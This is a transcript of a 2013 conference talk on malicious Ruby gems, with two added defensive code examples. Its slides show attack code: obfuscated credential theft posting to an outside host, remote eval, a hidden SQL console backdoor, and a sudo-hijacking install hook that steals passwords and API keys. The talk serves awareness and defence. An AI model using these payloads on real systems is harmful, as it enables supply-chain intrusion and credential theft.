Hacking with Gems (Ruby Conf Australia)

Benjamin Smith

February 22, 2013

Transcript

  1. Hacking with Gems
    Benjamin Smith
    @benjamin_smith
    Friday, February 22, 13

  2. How-to get rich quick and
    (maybe)
    not go to jail!

  3. who i am

  9. what i am NOT

  11. please do not try this at home

  13. how it all started
    GEM
      remote: https://rubygems.org/
      specs:
        actionmailer (3.2.12)
          actionpack (= 3.2.12)
          mail (~> 2.4.4)
        actionpack (3.2.12)
          activemodel (= 3.2.12)
          activesupport (= 3.2.12)
          builder (~> 3.0.0)
          erubis (~> 2.7.0)
    ...

  14. what’s the worst that could happen?

  16. gem 'awesome_rails_flash_messages'
    github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith

  17. before...

  18. after!

  19. some “side effects”
    if params.to_s.match(Base64.decode64('cGF...'))

  20. ...
    File.open("#{Rails.root}/public/development.log", 'a+') do |f|
      f.write("#{params.inspect}\n")
    end

  21. ?!?
    Net::HTTP.post_form(
      URI.parse(Base64.decode64('aHR0cDo...')),
      { 'log' => params.merge(:url => request.url).inspect }
    )

  22. i like cGFzc3dvcmQ=\n
    if params.to_s.match(Base64.decode64('cGF...'))

  23. i like password
    if params.to_s.match("password")

  24. “development.log”
    ...
    "user"=>{"email"=>"[email protected]",
    "password"=>"password",
    "remember_me"=>"0"}
    ...

  25. elsewhere...

  26. profit
    • Step 1: do something
    • Step 2: do something else
    • Step 3: ????
    • Step 4: profit

  27. profit
    • Step 1: write a gem that does something
    • Step 2:
    • Step 3:
    • Step 4:

  28. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3:
    • Step 4:

  29. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4:

  30. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4: profit

  31. profit
    • Step 1: write a gem that does something
    • Step 2: add code to harvest emails/pws
    • Step 3: use emails/pws on banking websites
    to transfer funds
    • Step 4: profit
    • Step 5: flee the country

  32. a one way ticket to

  33. that was easy.
    what else can I do?

  34. gem 'net_http_detector'
    github.com/benjaminleesmith/net_http_detector @benjamin_smith

  35. show me the hack
    Net::HTTP.post_form(
    #stark-samurai-8122.herokuapp.com/logs>,
    {"log"=>"{\"utf8\"=>\"✓\",
    \"authenticity_token\"=>\"PzpZUlRrRv1V
    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\",
    \"user\"=>{\"email\"=>\"test\",
    \"password\"=>\"pass4\"
    ...

  36. how it works
    def HTTP.valid_post_form(url, params)
      ...   # the original post_form, kept under a new name
    end
    def HTTP.post_form(url, params)
      self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
      Net::HTTP.valid_post_form(url, params)
    end
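
The wrapper above replaces Net::HTTP.post_form, logs the call and forwards it; an application owner can point the same hook the other way to catch the credential posts shown on the earlier slides. This is an added example, not code from the talk or from net_http_detector; the allow-listed host and the collector URL are made up.

```ruby
# Added example, not from the talk: the same Net::HTTP.post_form hook the
# net_http_detector slide uses, pointed the other way. It records every form
# post made in the process, attributes it to the calling file, flags bodies
# that carry credential-looking keys and refuses hosts outside an allow-list.
require "net/http"
require "uri"

module OutboundPostAudit
  Blocked   = Class.new(StandardError)
  LOG       = []                              # every attempted post_form call
  ALLOWED   = %w[api.example.com]             # constructed egress allow-list
  SENSITIVE = /password|passwd|secret|token|credential/i

  # Build the audit record; params.to_s is roughly what a harvesting gem
  # serialises with #inspect before posting it (see the earlier slides).
  def self.record(url, params, from)
    uri = URI(url.to_s)
    entry = {
      host: uri.host,
      from: from,
      sensitive: params.to_s.match?(SENSITIVE),
      allowed: ALLOWED.include?(uri.host),
    }
    LOG << entry
    entry
  end

  # Posts worth a human look: secret-looking data to a host not on the list.
  def self.flagged
    LOG.select { |e| e[:sensitive] && !e[:allowed] }
  end

  # Prepended onto Net::HTTP's singleton class, so `super` is the real method.
  def post_form(url, params)
    from  = caller_locations(1, 1).first.path   # file that made the call
    entry = OutboundPostAudit.record(url, params, from)
    unless entry[:allowed]
      raise Blocked, "post_form to #{entry[:host]} from #{from} blocked " \
                     "(sensitive=#{entry[:sensitive]})"
    end
    super
  end
end

Net::HTTP.singleton_class.prepend(OutboundPostAudit)

if __FILE__ == $0
  # Constructed stand-in for a harvesting gem's call; nothing leaves the host.
  begin
    Net::HTTP.post_form(URI("http://collector.example/logs"),
                        "log" => '{"user"=>{"email"=>"a@b.example", "password"=>"hunter2"}}')
  rescue OutboundPostAudit::Blocked => e
    puts e.message
  end
  p OutboundPostAudit.flagged
end
```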

  39. ...and one more thing...
    eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

  40. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
      @tables = ActiveRecord::Base.connection.tables
      if params[:query]
        @output = ActiveRecord::Base.connection.execute(params[:query])
      end
    end

  43. database what?
    append_before_filter :net_http_detector
    ...
    if params[:db_console]
    @tables =ActiveRecord::Base.connection.tables
    if params[:query]
    @output = ActiveRecord::Base.connection
    .execute(params[:query])
    github.com/benjaminleesmith/net_http_detector @benjamin_smith
    Friday, February 22, 13

    View Slide

  44. /users/sign_in

  45. /users/sign_in?db_console=t

  46. hello db access!

  47. SELECT * FROM users;

  48. UPDATE users SET admin=1
    WHERE id=42;

  49. CREATE USER admin1 WITH
    PASSWORD 'password';

  50. careful of wolves in sheep’s clothing

  51. Little Snitch
    obdev.at/products/littlesnitch/index.html @benjamin_smith

  52. profit
    • Step 1:
    • Step 2:
    • Step 3:
    • Step 4:
    • Step 5:

  53. profit
    • Step 1: write a gem that does something
    • Step 2:
    • Step 3:
    • Step 4:
    • Step 5:

  54. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3:
    • Step 4:
    • Step 5:

  55. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4:
    • Step 5:

  56. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5:

  57. profit
    • Step 1: write a gem that does something
    • Step 2: add code to provide DB access
    • Step 3: use personal info to apply for a boat
    loan (ie buy a pimp trimaran)
    • Step 4: profit
    • Step 5: flee the country

  58. i like the beach

  59. that was easy.
    what else can I do?

  60. gem 'better_date_to_s'
    github.com/benjaminleesmith/better_date_to_s @benjamin_smith

  61. what it claims to do
    Date.new(2005, 1, 1).to_s(:short)
    => "1 Jan"
    ... instead of...
    => " 1 Jan"

  63. what it also does
    set_date_formats_for(Rails.env, Rails.root.to_s)

  64. better_date_to_s.bundle

  65. behind the curtain
    if (strcmp(rails_env, "production") == 0) {
      sprintf(tar_command,
              "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1",
              rails_root, rails_root);
      system(tar_command);
    }

  66. what what

  67. i can haz source

  68. truth time
    • this gem doesn't actually work
    • but it could... if I wasn't lazy
    • "fat" gems are tricky to compile

  69. so much code so little time
    • Step 1: write a gem that does something
    • Step 2: add code to expose source
    • Step 3: sell to competitors?
    • Step 4: profit?
    • Step 5: flee the country

  70. that was easy hard.
    what else can I do?
    (that's easier)

  71. gem install be_truthy
    github.com/benjaminleesmith/be_truthy @benjamin_smith

  72. what it does
    > true.should be_true
    > User.new.should be_true
    > User.new.should be_truthy

  73. what it ACTUALLY does

  75. file tree looks ok

  76. source code looks good
    require "be_truthy/version"
    module BeTruthy
    end

  77. but what was this?

  78. I see no C

  79. run the what file?
    Gem::Specification.new do |gem|
      ...
      gem.extensions = ["Rakefile"]
      ...
    end

  80. there is no Rakefile

  81. gem fetch vs gem install
    > gem fetch be_truthy
    > gem unpack be_truthy-0.0.1.gem

  82. the real file tree


  84. what does the Rakefile do?

  85. sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
    FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

  86. File.open(profile, 'a+') do |f|
      f.write("alias sudo='ruby #{home}/.tmp'\n")
    end

  87. FileUtils.rm(__FILE__)

  88. fseventer
    fernlightning.com/doku.php?id=software:fseventer:start @benjamin_smith

  89. what does "sudo" do now?

  90. print "WARNING: Improper use of the sudo command ..."
    system "stty -echo"
    password = $stdin.gets.chomp
    system "stty echo"
    print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

  94. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

  95. /usr/bin/sudo dscl . -create /Users/#{username}
    ...
    /usr/bin/sudo dscl . -passwd /Users/#{username} password`

  96. Net::HTTP.post_form(
      URI.parse('http://.../logs'),
      { 'log' => 'ssh enabled' }
    )

  97. ssh [email protected]

  98. take away:
    don't install ben's gems

  100. take away:
    use windows?

  101. don't install ben's gems

  102. how could I get you
    to install my gems?

  103. what gems are
    trustworthy?

  104. how can I add my code
    to already trusted gems?

  105. back in the be_truthy gem
    gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
    gem_list = `gem list`
    Net::HTTP.post_form(...)

  109. now I own your gems

  110. > git clone your-gem-repo
    ...add a little code...
    > rake build
    > gem push your-gem

  111. do people trust your gems?

  112. do people who install
    your gems have
    trustworthy gems?

  114. there’s still one problem

  115. bootstrapping

  116. being popular sucks

  117. conferences

  118. values

  119. hamster

  120. wbench

  121. almost-sinatra

  122. almost-rack

  123. almost-rack-protection

  124. social engineering

  126. 5% adoption

  127. so what happens now?

  128. ruby gems goes down

  129. heroku deploys go down

  130. i go to the beach

  131. so what now?

  132. gem cert --build

  133. gem install rails -P HighSecurity

  134. bsmith$ gem install rails -P HighSecurity
    Fetching: activesupport-3.2.12.gem (100%)
    ERROR: While executing gem ...
    (Gem::Exception)
    Unsigned gem
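
As an added example (not from the talk), the Ruby below does offline what the `gem fetch` / `gem unpack` slides and the `-P HighSecurity` slide do by hand: it builds a constructed look-alike of the be_truthy package, reads the real file list and `extensions` out of the .gem, lists the files the public repository never had, and applies Gem::Security::HighSecurity to it. The gem name and contents are made up, and the helper functions are this example's own, not RubyGems' API.

```ruby
# Added example, not from the talk: look inside a .gem the way `gem fetch`
# + `gem unpack` lets you, before anything from it runs, and apply the same
# policy as `gem install -P HighSecurity` to it offline.
require "rubygems"
require "rubygems/package"
require "rubygems/security"
require "tmpdir"
require "fileutils"

# Read the package's own metadata and file list. Every entry in
# spec.extensions (Rakefile, extconf.rb, ...) is executed by `gem install`.
def inspect_gem(gem_path)
  pkg  = Gem::Package.new(gem_path)
  spec = pkg.spec                     # parsed from metadata.gz in the tarball
  {
    name: spec.name,
    version: spec.version.to_s,
    files: pkg.contents.sort,         # what data.tar.gz really ships
    extensions: spec.extensions,
    runs_code_on_install: !spec.extensions.empty?,
  }
end

# Files shipped in the .gem that the public repository never had;
# repo_files would normally come from `git ls-files` in the project checkout.
def unexpected_files(report, repo_files)
  report[:files] - repo_files
end

# Same check as `gem install foo -P HighSecurity`: nil when the gem carries
# a signature from a trusted certificate, otherwise the rejection reason.
def high_security_rejection(gem_path)
  Gem::Package.new(gem_path, Gem::Security::HighSecurity).verify
  nil
rescue Gem::Security::Exception => e
  e.message
end

# Constructed look-alike of the talk's be_truthy package (name and contents
# are made up): the repository tree holds only lib/be_truthy.rb, but the
# .gem also ships lib/tmp.rb and a Rakefile registered as an extension.
def build_demo_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p("lib")
    File.write("lib/be_truthy.rb", "module BeTruthy\nend\n")
    File.write("lib/tmp.rb", "# stand-in for the hidden payload file\n")
    File.write("Rakefile", "task(:default) { puts 'ran at install time' }\n")
    spec = Gem::Specification.new do |s|
      s.name       = "be_truthy_demo"
      s.version    = "0.0.1"
      s.summary    = "constructed demo gem"
      s.authors    = ["demo"]
      s.files      = %w[lib/be_truthy.rb lib/tmp.rb Rakefile]
      s.extensions = ["Rakefile"]
    end
    Gem::Package.build(spec, true)    # unsigned; spec validation skipped
    File.join(dir, spec.file_name)
  end
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    gem_path = build_demo_gem(dir)
    report   = inspect_gem(gem_path)
    p report
    p unexpected_files(report, ["lib/be_truthy.rb"])
    p high_security_rejection(gem_path)
  end
end
```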

  135. sandboxing

  136. github.com/rubygems/rubygems

  137. tools to detect
    malicious code

  138. private gem repos

  139. do not try this at home

  140. don't install gems you
    don't need to

  141. pay attention to what
    your gems do

  142. monitor your system

  143. read the source

  144. gem install coal-mine-canary
    github.com/benjaminleesmith/coal-mine-canary @benjamin_smith

  145. on install

  146. the results

  147. thank you!

  148. questions? ideas?
    @benjamin_smith
    https://github.com/benjaminleesmith